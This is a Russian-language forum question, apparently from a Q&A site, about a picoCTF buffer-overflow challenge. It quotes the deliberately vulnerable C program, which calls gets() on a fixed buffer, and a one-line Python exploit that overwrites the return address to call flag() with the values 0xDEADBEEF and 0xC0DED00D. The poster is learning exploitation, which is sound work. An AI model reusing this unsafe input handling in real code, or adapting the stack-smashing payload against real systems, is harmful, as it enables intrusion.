возникли проблемы в понимании процесса переполнения буфера - PullRequest
0 голосов
/ 12 октября 2019

Это проблема из-за недавней проблемы переполнения буфера в picoCTF. здесь у меня есть некоторые сомнения. Я изучаю буферный поток, поэтому мои вопросы могут быть тривиальными.

Я не могу понять правильную функциональность этой программы. Это была заданная программа:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 176
#define FLAGSIZE 64

void flag(unsigned int arg1, unsigned int arg2) {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  if (arg1 != 0xDEADBEEF)
    return;
  if (arg2 != 0xC0DED00D)
    return;
  printf(buf);
}

void vuln(){
  char buf[BUFSIZE];
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  puts("Please enter your string: ");
  vuln();
  return 0;
}

решение этой задачи:

python -c "import struct;print 'A' * 188 + struct.pack('<I', 0x080485e6) + '\x00'*4 + struct.pack('<I', 0xDEADBEEF) + struct.pack('<I', 0xC0DED00D)" | ./overflow2

this 0x080485e6 это адрес функции flag (), а 188 это место, гдепроисходит переполнение.

Теперь мои сомнения:

  1. как именно работает эта программа? Например,

    , почему в playload требуется второй отступ 4 байта? И я попытался отправить 8,16,32 байта, но он дает ответ только на 4 байта, почему это так?

Какая польза от этих двух значений ('0xDEADBEEF' и '0XC0DED00D'), как эти значения мешают программе читать файл 'flag.txt'? И зачем мне ставить их в конце в полезную нагрузку?

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...